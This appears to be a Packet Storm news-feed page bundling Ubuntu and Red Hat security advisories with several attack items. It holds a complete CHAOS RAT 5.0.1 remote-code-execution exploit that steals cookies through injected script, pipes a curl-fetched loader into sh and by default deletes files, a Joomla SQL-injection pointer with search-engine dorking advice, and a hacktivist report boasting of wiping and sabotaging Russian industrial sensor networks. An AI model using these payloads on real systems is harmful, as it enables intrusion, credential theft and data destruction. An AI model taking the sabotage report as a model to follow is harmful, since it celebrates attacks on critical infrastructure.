The Windows Kernel suffers from a subkey list use-after-free vulnerability due to a mishandling of partial success in CmpAddSubKeyEx.

Windows Kernel Subkey List Use-After-Free

Ubuntu Security Notice 6719-2 - USN-6719-1 fixed a vulnerability in util-linux. Unfortunately, it was discovered that the fix did not fully address the issue. This update removes the setgid permission bit from the wall and write utilities. Skyler Ferrante discovered that the util-linux wall command did not filter escape sequences from command line arguments. A local attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6719-2  
April 10, 2024

util-linux vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

util-linux could be made to expose sensitive information.

Software Description:  
- util-linux: miscellaneous system utilities

Details:

USN-6719-1 fixed a vulnerability in util-linux. Unfortunately, it was  
discovered that the fix did not fully address the issue. This update  
removes the setgid permission bit from the wall and write utilities.

Original advisory details:

  Skyler Ferrante discovered that the util-linux wall command did not filter  
  escape sequences from command line arguments. A local attacker could  
  possibly use this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   util-linux                      2.39.1-4ubuntu2.2

Ubuntu 22.04 LTS:  
   util-linux                      2.37.2-4ubuntu3.4

Ubuntu 20.04 LTS:  
   util-linux                      2.34-0.1ubuntu9.6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6719-2  
   https://ubuntu.com/security/notices/USN-6719-1  
   CVE-2024-28085

Package Information:  
   https://launchpad.net/ubuntu/+source/util-linux/2.39.1-4ubuntu2.2  
   https://launchpad.net/ubuntu/+source/util-linux/2.37.2-4ubuntu3.4  
   https://launchpad.net/ubuntu/+source/util-linux/2.34-0.1ubuntu9.6

Ubuntu Security Notice USN-6719-2

Ubuntu Security Notice 6721-2 - USN-6721-1 fixed vulnerabilities in X.Org X Server. That fix was incomplete resulting in a regression. This update fixes the problem. It was discovered that X.Org X Server incorrectly handled certain data. An attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6721-2  
April 09, 2024

xorg-server, xwayland regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

A regression was fixed in X.Org X Server.

Software Description:  
- xorg-server: X.Org X11 server  
- xwayland: X server for running X clients under Wayland

Details:

USN-6721-1 fixed vulnerabilities in X.Org X Server. That fix was incomplete  
resulting in a regression. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that X.Org X Server incorrectly handled certain data.  
 An attacker could possibly use this issue to expose sensitive information.  
 (CVE-2024-31080, CVE-2024-31081, CVE-2024-31082)

 It was discovered that X.Org X Server incorrectly handled certain glyphs.  
 An attacker could possibly use this issue to cause a crash or expose sensitive  
 information. (CVE-2024-31083)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  xserver-xorg-core               2:21.1.7-3ubuntu2.9  
  xwayland                        2:23.2.0-1ubuntu0.6

Ubuntu 22.04 LTS:  
  xserver-xorg-core               2:21.1.4-2ubuntu1.7~22.04.10  
  xwayland                        2:22.1.1-1ubuntu0.13

Ubuntu 20.04 LTS:  
  xserver-xorg-core               2:1.20.13-1ubuntu1~20.04.17  
  xwayland                        2:1.20.13-1ubuntu1~20.04.17

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.19.6-1ubuntu4.15+esm8  
  xwayland                        2:1.19.6-1ubuntu4.15+esm8

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.18.4-0ubuntu0.12+esm13  
  xwayland                        2:1.18.4-0ubuntu0.12+esm13

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.15.1-0ubuntu2.11+esm12

After a standard system update you need to restart -APP- to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6721-2  
  https://ubuntu.com/security/notices/USN-6721-1  
  https://launchpad.net/bugs/2060354

Package Information:  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.7-3ubuntu2.9  
  https://launchpad.net/ubuntu/+source/xwayland/2:23.2.0-1ubuntu0.6  
  https://launchpad.net/ubuntu/+source/xorg-server/2:21.1.4-2ubuntu1.7~22.04.10  
  https://launchpad.net/ubuntu/+source/xwayland/2:22.1.1-1ubuntu0.13  
  https://launchpad.net/ubuntu/+source/xorg-server/2:1.20.13-1ubuntu1~20.04.17

Ubuntu Security Notice USN-6721-2

CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

    # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/import timeimport requestsimport threadingimport jsonimport websocketimport http.clientimport argparseimport sysimport refrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServerclass Collector(BaseHTTPRequestHandler):    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):        self.ip = ip        self.port = port        self.target = target        self.shell_command = command        self.video_name = video_name         super().__init__(*args, **kwargs)    def do_GET(self):        if self.path == "/loader.sh":            self.send_response(200)            self.end_headers()            command = str.encode(self.shell_command)            self.wfile.write(command)        elif self.path == "/video.mp4":            with open(self.video_name, 'rb') as f:                self.send_response(200)                self.send_header('Content-type', 'video/mp4')                self.end_headers()                self.wfile.write(f.read())        else:            cookie = self.path.split("=")[1]            self.send_response(200)            self.end_headers()            self.wfile.write(b"")            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))            background_thread.start()def convert_to_int_array(string):    int_array = []    for char in string:        int_array.append(ord(char))    return int_arraydef extract_client_info(path):    with open(path, 'rb') as f:        data = str(f.read())    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"    address_pattern = re.compile(address_regexp)    address = address_pattern.findall(data)[0].split("=")[1]    port_regexp = r"main\.Port=\d{1,6}"    port_pattern = re.compile(port_regexp)    port = port_pattern.findall(data)[0].split("=")[1]    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"    jwt_pattern = re.compile(jwt_regexp)    jwt = jwt_pattern.findall(data)[0].split("=")[1]    return f"{address}:{port}", jwtdef keep_connection(target, cookie, hostname, username, os_name, mac, ip):    print("Spoofing agent connection")    headers = {            "Cookie": f"jwt={cookie}"    }    while True:        data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}        r = requests.get(f"http://{target}/health", headers=headers)        r = requests.post(f"http://{target}/device", headers=headers, json=data)        time.sleep(30)def handle_command(target, cookie, mac, ip, port):    print("Waiting to serve malicious command outupt")    headers = {        "Cookie": f"jwt={cookie}",        "X-Client": mac    }    ws = websocket.WebSocket()    ws.connect(f'ws://{target}/client', header=headers)    while True:        response = ws.recv()        command = json.loads(response)['command']        data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}        ws.send_binary(json.dumps(data))def run_exploit(cookie, target, ip, port):    print(f"Exploiting {target} with JWT {cookie}")    conn = http.client.HTTPConnection(target)    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',        'Cookie': f'jwt={cookie}'    }    conn.request(        'POST',        '/generate',        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',        headers    )def run(ip, port, target, command, video_name):    server_address = (ip, int(port))    collector = partial(Collector, ip, port, target, command, video_name)    httpd = HTTPServer(server_address, collector)    print(f'Server running on port {ip}:{port}')    httpd.serve_forever()if __name__ == "__main__":    parser = argparse.ArgumentParser()    subparsers = parser.add_subparsers(dest="option")    exploit = subparsers.add_parser("exploit")    exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")    exploit.add_argument("-j", "--jwt", help="The JWT token to use")    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")    extract = subparsers.add_parser("extract")    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)    args = parser.parse_args()    if args.option == "exploit":        if args.target != None and args.jwt != None:            target = args.target            jwt = args.jwt        elif args.file != None:            target, jwt = extract_client_info(args.file)        else:            exploit.print_help(sys.stderr)            sys.exit(1)        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))        bg.start()        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))        cmd.start()        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))        server.start()    elif args.option == "extract":        target, jwt = extract_client_info(args.file)        print(f"CHAOS server: {target}\nJWT: {jwt}")    else:        parser.print_help(sys.stderr)        sys.exit(1)

CHAOS RAT 5.0.1 Remote Command Execution

Joomla SP Page Builder component version 5.2.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : SP Page Builder 5.2.7 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               || # Vendor    : https://extensions.joomla.org/extension/sp-page-builder/                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here[+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Joomla SP Page Builder 5.2.7 SQL Injection

This report seems to detail an operation to disable Russia's industrial sensor and monitoring infrastructure at www.moscollector.ru.

    MOSCOLLECTOR TAKEDOWN - 9th of April 2024---------------------------------------------------------------Russia's Industrial Sensor and Monitoring Infrastructure has been disabled:[moscollector.ru](https://www.moscollector.ru/)Hacked data is available at[https://ruexfil.com/mos](https://ruexfil.com/mos/)It includes Russia's Network Operation Center (NOC) to monitors and control Gas, Water, Firealarmand many others, including a vast network of remote sensors and IoT controllers. A total of 87,000sensors have been disabled.Milestones:- Initial access June 2023.- Access to[112 Emergency Service](https://ruexfil.com/mos/takedown/112-emergency-service.png).- 87,000[sensors](https://ruexfil.com/mos/takedown/sensors)and controls have been disabled (including Airports, subways, gas-pipelines, ...).-[Fuxnet](https://ruexfil.com/mos/takedown/fuxnet/)(stuxnet on steroids) was deployed earlier to slowly and physically destroy sensory equipment  (by NAND/SSD exhaustion and introducing bad CRC into the firmware).- Fuxnet has now started to flood the RS485/MBus and is sending 'random' commands to 87,000 embedded  control and sensory systems (carefully excluding hospitals, airports, ...and other civilian targets).- All servers have been deleted. All routers have been reset to factory reset. Most workstations (including  the admins workstations) have been[deleted](https://ruexfil.com/mos/takedown/).- Access to the office building has been disabled (all key-cards have been invalidated).- Moscollector has recently been[certified by the FSB](https://ruexfil.com/mos/takedown/FSB/fsb-certifies-mos.jpg)for being 'secure & trusted' (picture included)- Defaced the webpage (https://web.archive.org/web/20240409020908/https://moscollector.ru/)The media pack, screenshots and videos are available here:[https://ruexfil.com/mos/takedown](https://ruexfil.com/mos/takedown/)([.onion](http://cnqdc7cn4y5t6l5mxmyhwrp6wbneialihcdidc6a6ctdcrhktzmdbiqd.onion/))It contains:- GPS coordinates of all 87,000 sensors- Database of their internal and[secure Messaging](https://ruexfil.com/mos/takedown/dumps/)Platform (Dialog; used by Moscollector employees).- Screenshots of the Network Operation Centre- Screenshots of servers, routers, databases, ...- Screenshots of maps, blueprints of buildings, ... etc etc- Screenshots accessing their domain registrar- Screenshots of FuxNet source code and mode of operation- Video of FuxNet deploying and disabling the sensorsThe Op was conducted by BlackJack.--- After takedown report- About 1,700 sensor routers were destroyed. The central command-dispatcher and DataBase has been destroyed.  => All 87,000[sensors are offline](https://ruexfil.com/mos/takedown/fuxnet/)- Key-cards to enter the office and server rooms have been invalidated- All databases have been[wiped](https://ruexfil.com/mos/takedown/).- All mail has been[wiped](https://ruexfil.com/mos/takedown/).- A total of 30TB of data has been wiped. Including the backup drives.- Zabbix and other internal staging and monitoring servers have been wiped.- All admin workstations and most user workstations have been wiped.- Exhausted the corporate credit card.- Took control of their[domain](https://ruexfil.com/mos/takedown/domain/we-now-own-their-domain.png)"moscollector.ru".  => Our server stats:[WEB Traffic](https://ruexfil.com/mos/takedown/domain/domain-stolen-traffic.png),[Email Traffic](https://ruexfil.com/mos/takedown/domain/domain-stolen-emails.png)- Took down their[Firewall](https://ruexfil.com/mos/takedown/takedown_firewall.png)and disabled their Internet.- Webpage has been defaced:https://web.archive.org/web/20240409020908/https://moscollector.ru/- Took over their Facebook:[Blackjack Was Here](https://ruexfil.com/mos/takedown/facebook_blackjack-was-here.png),[Slava Ukraini](https://ruexfil.com/mos/takedown/facebook_ukraine.png)- Disabled 566 of their[SIM cards](https://ruexfil.com/mos/takedown/phone-sims-disabled.png)/[phones](https://ruexfil.com/mos/takedown/phone-sims-disabled2.png).- Data published at[https://ruexfil.com/mos/takedown](https://ruexfil.com/mos/takedown/).Sent with [Proton Mail](https://proton.me/) secure email.

Fuxnet: Disabling Russia's Industrial Sensor And Monitoring Infrastructure

Red Hat Security Advisory 2024-1750-03 - An update for unbound is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1750.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: unbound security updateAdvisory ID:        RHSA-2024:1750-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1750Issue date:         2024-04-10Revision:           03CVE Names:          CVE-2024-1488====================================================================Summary: An update for unbound is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The unbound packages provide a validating, recursive, and caching DNS or DNSSEC resolver.Security Fix(es):* A vulnerability was found in Unbound due to incorrect default permissions,allowing any process outside the unbound group to modify the unbound runtimeconfiguration. The default combination of the \"control-use-cert: no\" option witheither explicit or implicit use of an IP address in the \"control-interface\"option could allow improper access. If a process can connect over localhost toport 8953, it can alter the configuration of unbound.service. This flaw allowsan unprivileged local process to manipulate a running instance, potentiallyaltering forwarders, allowing them to track all queries forwarded by the localresolver, and, in some cases, disrupting resolving altogether.To mitigate the vulnerability, a new file\"/etc/unbound/conf.d/remote-control.conf\" has been added and included in themain unbound configuration file, \"unbound.conf\". The file contains twodirectives that should limit access to unbound.conf:    control-interface: \"/run/unbound/control\"    control-use-cert: \"yes\"For details about these directives, run \"man unbound.conf\".Updating to the version of unbound provided by this advisory should, in mostcases, address the vulnerability. To verify that your configuration is notvulnerable, use the \"unbound-control status | grep control\" command. If theoutput contains \"control(ssl)\" or \"control(namedpipe)\", your configuration isnot vulnerable. If the command output returns only \"control\", the configurationis vulnerable because it does not enforce access only to the unbound groupmembers. To fix your configuration, add the line \"include:/etc/unbound/conf.d/remote-control.conf\" to the end of the file\"/etc/unbound/unbound.conf\". If you use a custom\"/etc/unbound/conf.d/remote-control.conf\" file, add the new directives to thisfile. (CVE-2024-1488)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-1488References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2264183

Red Hat Security Advisory 2024-1750-03

Red Hat Security Advisory 2024-1747-03 - An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1747.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:1747-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1747Issue date:         2024-04-10Revision:           03CVE Names:          CVE-2023-4623====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: fix use-after-free in HFSC qdisc (CVE-2023-4623)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-4623References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2237757

Red Hat Security Advisory 2024-1747-03

Red Hat Security Advisory 2024-1746-03 - An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1746.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2024:1746-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1746Issue date:         2024-04-10Revision:           03CVE Names:          CVE-2022-42896====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)* kernel: net/sched: sch_hfsc UAF (CVE-2023-4623)* Kernel: bluetooth: Unauthorized management command execution (CVE-2023-2002)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-42896References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2147364https://bugzilla.redhat.com/show_bug.cgi?id=2187308https://bugzilla.redhat.com/show_bug.cgi?id=2237757

Red Hat Security Advisory 2024-1746-03

Red Hat Security Advisory 2024-1722-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.2 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1722.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1722-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1722Issue date:         2024-04-09Revision:           03CVE Names:          CVE-2023-45234====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.2 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45234References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258697

Source

Packet Storm